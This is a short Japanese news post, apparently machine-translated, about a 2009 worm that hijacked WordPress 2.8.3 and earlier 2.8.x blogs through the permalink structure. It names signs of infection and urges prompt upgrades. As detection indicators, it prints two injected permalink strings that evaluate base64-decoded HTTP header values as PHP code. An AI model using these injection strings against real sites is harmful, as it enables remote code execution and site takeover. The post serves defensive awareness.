WordPressワームの流行

1か月前、WordPress 2.8.3の新しい重大な脆弱性について知られるようになり、管理者パスワードをリモートで簡単に変更できるようになりました。 この脆弱性を修正するために、WordPress 2.8.4 すぐにリリースされました 。 結局のところ、すべてのブロガーが更新をフォローしているわけではありません。



今週末、新しいウイルスの真の流行が勃発し、WordPress 2.8.3およびブランチ2.8の以前のバージョンのエンジンでブログに感染しました。 ワームはブログにログインし、パーマリンク構造を介して悪意のあるコードを起動し、2番目の管理者になります。その後、ユーザーページから自分自身を消去するスクリプトを実行し、アーカイブトピックのスパムとリンクを静かに追加し始めます。



害虫の存在をすぐに検出することは、特に何も発表していない場合は特に困難です。 これを行うには、permalinks / rssフィードで次のコードの存在を確認します。



%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/







または



“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%







または間違い



'error on line 22 at column 71: xmlParseEntityRef: no name wordpress'







そのようなコードがあるか、フィードが壊れている場合、ブログは感染しています。



ワーム駆除手順は簡単な作業です。



ところで、Matt Mullenwegはセキュリティのトピックに関する大きな記事を作成しました。そこでは、ユーザーに絶えず新しいアップデートを監視してインストールするように促しています。ここではWordPressのアップグレード手順を説明します 。 これは、今回および将来の流行から身を守る唯一の方法です。



All Articles